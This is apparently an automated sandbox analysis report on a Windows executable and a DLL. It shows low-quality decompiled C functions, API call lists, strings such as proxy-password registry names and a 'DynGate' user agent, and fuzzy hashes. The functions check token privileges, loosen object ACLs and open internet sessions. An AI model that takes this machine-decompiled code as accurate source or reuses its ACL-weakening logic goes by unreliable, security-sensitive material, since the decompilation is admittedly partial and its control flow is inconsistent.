                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098354B
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 7098356D
                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 70983597
                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 709835A9
                                                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 709835C5
                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 709835CF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 709835D7
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709835DA
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709835E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1769087308-0
                                                                                                        • Opcode ID: 37a4a806b27f25b10aa89a6a07c67739ebc26aaa68cdfb7a40dcd1e3e9f6da2a
                                                                                                        • Instruction ID: c84f85a42289435280ddad0cedef3ba2d1dd61225c5b2c009df2c9c6fa99ed01
                                                                                                        • Opcode Fuzzy Hash: 37a4a806b27f25b10aa89a6a07c67739ebc26aaa68cdfb7a40dcd1e3e9f6da2a
                                                                                                        • Instruction Fuzzy Hash: 66314DB2218301AFD700DFA5CC84E6BBBBCEB88794F10891DF55687291D775E8059BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982090, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 22%
                                                                                                        			E70982090(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v40;
				char _v48;
				void* _v52;
				long _v56;
				long _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v108;
				intOrPtr _t28;
				intOrPtr _t29;
				long* _t34;
				signed int _t38;
				void* _t50;
				long _t52;
				intOrPtr _t55;

				_t28 =  *_a8;
				_t52 = 0;
				_v48 = 0;
				if(_t28 == 0) {
					_t29 = _a4;
					if(_t29 == 0) {
						goto L2;
					} else {
						_t55 = _a12;
						__imp__GetNamedSecurityInfoW(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
						if(_t29 != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					_t55 = _a12;
					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
					if(_t28 == 0) {
						L5:
						_v68 = 0x44;
						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
						if(_t50 != 0) {
							_t34 =  &_v68;
							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
							if(_t34 != 0) {
								_v76 = 1;
								_v80 = 0x10000000;
								_v72 = 3;
								_v64 = 0;
								_v68 = 0;
								_v52 = _t50;
								_v60 = 0;
								_v56 = 0;
								__imp__SetEntriesInAclW(1,  &_v80, _v96,  &_v92);
								_t38 =  *_v56;
								if(_t38 == 0) {
									_t38 = _v60;
									if(_t38 != 0) {
										__imp__SetNamedSecurityInfoW(_t38, _t55, 4, 0, 0, _v108, 0); // executed
										goto L11;
									}
								} else {
									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0); // executed
									L11:
									asm("sbb esi, esi");
									_t52 =  ~_t38 + 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
						return _t52;
					} else {
						L2:
						return 0;
					}
				}
			}























                                                                                                        0x70982097
                                                                                                        0x7098209e
                                                                                                        0x709820a0
                                                                                                        0x709820a6
                                                                                                        0x709820d0
                                                                                                        0x709820d6
                                                                                                        0x00000000
                                                                                                        0x709820d8
                                                                                                        0x709820d8
                                                                                                        0x709820ed
                                                                                                        0x709820f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709820f5
                                                                                                        0x709820a8
                                                                                                        0x709820a8
                                                                                                        0x709820bd
                                                                                                        0x709820c5
                                                                                                        0x709820f7
                                                                                                        0x709820fc
                                                                                                        0x70982111
                                                                                                        0x70982115
                                                                                                        0x7098211b
                                                                                                        0x70982124
                                                                                                        0x7098212c
                                                                                                        0x70982143
                                                                                                        0x7098214b
                                                                                                        0x70982153
                                                                                                        0x7098215b
                                                                                                        0x7098215f
                                                                                                        0x70982163
                                                                                                        0x70982167
                                                                                                        0x7098216b
                                                                                                        0x7098216f
                                                                                                        0x70982179
                                                                                                        0x7098217d
                                                                                                        0x70982193
                                                                                                        0x70982199
                                                                                                        0x709821a7
                                                                                                        0x00000000
                                                                                                        0x709821a7
                                                                                                        0x7098217f
                                                                                                        0x7098218b
                                                                                                        0x709821ad
                                                                                                        0x709821b1
                                                                                                        0x709821b3
                                                                                                        0x709821b3
                                                                                                        0x7098217d
                                                                                                        0x709821bd
                                                                                                        0x709821bd
                                                                                                        0x709821cc
                                                                                                        0x709820c9
                                                                                                        0x709820c9
                                                                                                        0x709820cf
                                                                                                        0x709820cf
                                                                                                        0x709820c5

                                                                                                        APIs
                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?,00000100,00000000,00000000,?,?,709821ED,7098F3C8,00000008), ref: 709820BD
                                                                                                        • GetNamedSecurityInfoW.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?,00000100,00000000,00000000,?,?,709821ED,7098F3C8,00000008), ref: 709820ED
                                                                                                        • GetProcessHeap.KERNEL32 ref: 70982104
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098210B
                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 70982124
                                                                                                        • SetEntriesInAclW.ADVAPI32(00000001,?,?,?), ref: 7098216F
                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,?,00000000), ref: 7098218B
                                                                                                        • SetNamedSecurityInfoW.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 709821A7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 709821B6
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709821BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                        • String ID: D
                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                        • Opcode ID: 67737583983b2b76e718355d998930ec119077133bb92ac38dd96d5fdc51d820
                                                                                                        • Instruction ID: 4333cdb5d39f382f2c646c1232eaecf6024f6f1d15f4bdf58e913b08543b6954
                                                                                                        • Opcode Fuzzy Hash: 67737583983b2b76e718355d998930ec119077133bb92ac38dd96d5fdc51d820
                                                                                                        • Instruction Fuzzy Hash: E9411AF2218305AFE7108F95CC88F6BBBBCEB85798F50492DF65286290D675DC049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C23D1, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004C23DB
                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004C2457,?,Proxy_IP), ref: 004D8DAB
                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                          • Part of subcall function 004B597B: __EH_prolog3_GS.LIBCMT ref: 004B5982
                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$QueryValue$H_prolog3_H_prolog3_catch__wmemset
                                                                                                        • String ID: Init: Load Registry Proxy Settings failed (.\Global.cpp, 685)$ProxyPassword$ProxyPasswordAES$ProxyPasswordSecure$ProxyUsername$Proxy_Exceptions$Proxy_IP$Proxy_IPIE$Proxy_Type
                                                                                                        • API String ID: 2336546291-1449184549
                                                                                                        • Opcode ID: a1ae9c11efbebaf070939d308904bccb3aaf084a19bff00f448aa0b62fe4f81f
                                                                                                        • Instruction ID: 4eb981286a0cb3f2b9a51b73bebf72b59e17a6e9c12f6f4a10bf5902cb55b58d
                                                                                                        • Opcode Fuzzy Hash: a1ae9c11efbebaf070939d308904bccb3aaf084a19bff00f448aa0b62fe4f81f
                                                                                                        • Instruction Fuzzy Hash: 12715C71D40244EADB14FFA9CA56BDD7B75AF11708F10406EE001672E2DBB85F08D79A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709833D0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E709833D0(void* _a4) {
				void _v0;
				void* _v16;
				void _v72;
				long _v76;
				long _v80;
				long _v84;
				void* _v88;
				char _v96;
				DWORD* _t32;
				int _t36;
				long _t52;

				_t52 = _a4;
				_v76 = 0;
				_v84 = _t52;
				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
					_a4 = 0;
					_v80 = 0;
					if( *0x7098f2ac <= 5) {
						L7:
						DuplicateToken(_v84, 1,  &_a4);
						if(_v0 != 0) {
							goto L8;
						}
					} else {
						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
						if(_t36 != 0 && _v76 == 3) {
							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
						}
						if(_v0 != 0) {
							L8:
							_t32 =  &_v84;
							_v84 = 0x44;
							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
							if(_t32 != 0) {
								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
							}
							FindCloseChangeNotification(_v16); // executed
						} else {
							goto L7;
						}
					}
					if(_t52 == 0) {
						CloseHandle(_v88);
					}
					return _v80;
				} else {
					return _v76;
				}
			}














                                                                                                        0x709833d4
                                                                                                        0x709833d8
                                                                                                        0x709833e0
                                                                                                        0x709833e6
                                                                                                        0x7098340d
                                                                                                        0x70983415
                                                                                                        0x7098341d
                                                                                                        0x70983463
                                                                                                        0x7098346f
                                                                                                        0x7098347a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098341f
                                                                                                        0x70983439
                                                                                                        0x7098343d
                                                                                                        0x70983459
                                                                                                        0x70983459
                                                                                                        0x70983461
                                                                                                        0x7098347c
                                                                                                        0x7098347c
                                                                                                        0x7098348a
                                                                                                        0x70983492
                                                                                                        0x7098349a
                                                                                                        0x709834ab
                                                                                                        0x709834ab
                                                                                                        0x709834b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983461
                                                                                                        0x709834ba
                                                                                                        0x709834c1
                                                                                                        0x709834c1
                                                                                                        0x709834cc
                                                                                                        0x709834cd
                                                                                                        0x709834d5
                                                                                                        0x709834d5

                                                                                                        APIs
                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A, Fw), ref: 709833F1
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,750D4AB0), ref: 70983439
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 70983459
                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 7098346F
                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 70983492
                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 709834AB
                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 709834B6
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709834C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                        • String ID: Fw$D
                                                                                                        • API String ID: 1214873377-4042606419
                                                                                                        • Opcode ID: a3720729945616fe58f388d905c732c763d47f0a1f997908e5d7a30b28f97e88
                                                                                                        • Instruction ID: 7eebac51246d02bccb61b8b3590deb060152146875fa054b78dab7fdf22d9949
                                                                                                        • Opcode Fuzzy Hash: a3720729945616fe58f388d905c732c763d47f0a1f997908e5d7a30b28f97e88
                                                                                                        • Instruction Fuzzy Hash: A03145B2208305AFD701CF65C844F6BB7F9AB84B54F00891DF696872D0D774E809DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C08ED, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004C08F4
                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                        • InternetCloseHandle.WININET(?), ref: 004C0973
                                                                                                        • InternetOpenW.WININET(-00000004), ref: 004C09BE
                                                                                                        • InternetSetOptionW.WININET(00000000,00000049,?,00000004), ref: 004C09F2
                                                                                                        • InternetSetOptionW.WININET(00000000,0000004A,00000014,00000004), ref: 004C09FD
                                                                                                        • InternetSetOptionW.WININET(?,00000002,?,00000004), ref: 004C0A1A
                                                                                                        • InternetSetOptionW.WININET(?,00000005,00002328,00000004), ref: 004C0A29
                                                                                                        • InternetSetOptionW.WININET(?,00000006,0001D4C0,00000004), ref: 004C0A38
                                                                                                        Strings
                                                                                                        • Mozilla/4.0 (compatible; MSIE 6.0; DynGate), xrefs: 004C098B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Internet$Option$H_prolog3$CloseHandleOpen
                                                                                                        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                        • API String ID: 1037293847-385611765
                                                                                                        • Opcode ID: 95255fb6545769eb3ee9761ef4d029497eb869dce2e65f918286e9dc7ace8657
                                                                                                        • Instruction ID: a9245877e6b401a6c61c8af2d1480b8a469057b773e8c57abfe80e1662820dad
                                                                                                        • Opcode Fuzzy Hash: 95255fb6545769eb3ee9761ef4d029497eb869dce2e65f918286e9dc7ace8657
                                                                                                        • Instruction Fuzzy Hash: 0A41D1B6900706EBEB60EBA4CC46FFFB7B8EB44710F10452EE251A6291D7785A41CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BF3A9, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,000000F4), ref: 004BF436
                                                                                                        • FindClose.KERNEL32(?), ref: 004BF4A5
                                                                                                        • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,000000F4), ref: 004BF6A3
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3InformationVolume$CloseCriticalFindInitializeSection
                                                                                                        • String ID: %x%x$C:\$_%x%x
                                                                                                        • API String ID: 3795106124-2960449516
                                                                                                        • Opcode ID: fef80c85b36d193c93d8bb30951f9e7deb5764eb3a1aa3f506f62c2fa7564211
                                                                                                        • Instruction ID: ff7ae4a22af98f1ede601656746b62f7d23d60e92932ca53c8e4e25f4943a0b2
                                                                                                        • Opcode Fuzzy Hash: fef80c85b36d193c93d8bb30951f9e7deb5764eb3a1aa3f506f62c2fa7564211
                                                                                                        • Instruction Fuzzy Hash: 77C18074C00148EEDF11EBA4CD51BEEBB79AF25308F1480AEE105A31A2DB785F49CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986E50, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E70986E50(WCHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				short _v18;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				WCHAR* _t23;
				WCHAR* _t31;
				signed char _t33;
				signed int _t34;
				WCHAR* _t38;
				int _t39;
				WCHAR* _t40;
				WCHAR* _t46;
				WCHAR* _t47;
				WCHAR* _t49;
				WCHAR* _t50;
				WCHAR* _t55;
				WCHAR* _t57;

				_t40 =  *0x7098f57c; // 0xa65be8
				_t55 = _a4;
				_v22 = 0;
				_v24 = 0x6e;
				_t23 =  *0x7098f58c; // 0x7837d8
				_v28 = 0x640068;
				WritePrivateProfileStringW(_t23,  &_v28, _t55, _t40);
				_t49 =  *0x7098f57c; // 0xa65be8
				_t50 =  *0x7098f58c; // 0x7837d8
				asm("sbb eax, eax");
				_v26 = 0x70;
				WritePrivateProfileStringW(_t50,  &_v28,  ~_t55 & _a8, _t49); // executed
				_v18 = 0;
				_v26 = 0x73;
				_v20 = (0 | _a12 != 0x00000000) + 0x30;
				_t46 =  *0x7098f57c; // 0xa65be8
				asm("sbb esi, esi");
				_t57 =  ~_t55 &  &_v20;
				_t31 =  *0x7098f58c; // 0x7837d8
				WritePrivateProfileStringW(_t31,  &_v28, _t57, _t46); // executed
				_t33 = _a16;
				_v26 = 0x74;
				_t34 = _t33 & 0x000000ff;
				if(_t33 == 0) {
					_t34 = 0xc;
				}
				_push(_t34);
				wsprintfW( &_v24, StrChrW(0x7098cdcc, 0x25));
				_t47 =  *0x7098f57c; // 0xa65be8
				_t38 =  *0x7098f58c; // 0x7837d8
				_t39 = WritePrivateProfileStringW(_t38,  &_v24, _t57, _t47); // executed
				return _t39;
			}






















                                                                                                        0x70986e53
                                                                                                        0x70986e5a
                                                                                                        0x70986e68
                                                                                                        0x70986e77
                                                                                                        0x70986e7c
                                                                                                        0x70986e83
                                                                                                        0x70986e8b
                                                                                                        0x70986e8d
                                                                                                        0x70986e98
                                                                                                        0x70986e9e
                                                                                                        0x70986ea9
                                                                                                        0x70986eb5
                                                                                                        0x70986ebf
                                                                                                        0x70986ed0
                                                                                                        0x70986ede
                                                                                                        0x70986ee3
                                                                                                        0x70986ee9
                                                                                                        0x70986eec
                                                                                                        0x70986eee
                                                                                                        0x70986ef6
                                                                                                        0x70986ef8
                                                                                                        0x70986efe
                                                                                                        0x70986f06
                                                                                                        0x70986f09
                                                                                                        0x70986f0b
                                                                                                        0x70986f0b
                                                                                                        0x70986f10
                                                                                                        0x70986f24
                                                                                                        0x70986f2a
                                                                                                        0x70986f30
                                                                                                        0x70986f40
                                                                                                        0x70986f47

                                                                                                        APIs
                                                                                                        • WritePrivateProfileStringW.KERNEL32 ref: 70986E8B
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70986EB5
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70986EF6
                                                                                                        • StrChrW.SHLWAPI(7098CDCC,00000025,?), ref: 70986F18
                                                                                                        • wsprintfW.USER32 ref: 70986F24
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70986F40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                        • String ID: h$t
                                                                                                        • API String ID: 2965074233-520427273
                                                                                                        • Opcode ID: 2aeb8af10bccad1c49e3b1641d8110741fa45951389af1d02b4a6628353900e8
                                                                                                        • Instruction ID: bd3f2e9b173c83771bcd3303f8a0a250b1f0fe5da0907b529168fa95f41919d9
                                                                                                        • Opcode Fuzzy Hash: 2aeb8af10bccad1c49e3b1641d8110741fa45951389af1d02b4a6628353900e8
                                                                                                        • Instruction Fuzzy Hash: E7215EB6528340ABD300DF69CC54E6BB7F9EFD8740F009A2DF545C33A0E67499089BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984A90, Relevance: 13.8, APIs: 9, Instructions: 250memorycomstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E70984A90() {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				char _v64;
				intOrPtr* _v68;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				WCHAR* _v92;
				intOrPtr* _v104;
				intOrPtr* _v112;
				intOrPtr* _v120;
				intOrPtr* _v128;
				intOrPtr* _v136;
				intOrPtr* _v144;
				intOrPtr* _v148;
				intOrPtr _v152;
				intOrPtr* _v160;
				char* _t80;
				intOrPtr* _t82;
				void* _t84;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t95;
				void* _t97;
				char* _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t120;
				int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				WCHAR* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				signed int _t134;
				void* _t136;
				intOrPtr* _t138;
				intOrPtr* _t161;
				char _t185;
				void* _t186;
				void* _t187;
				char _t189;
				char _t190;
				signed int* _t191;
				void* _t192;
				WCHAR* _t194;

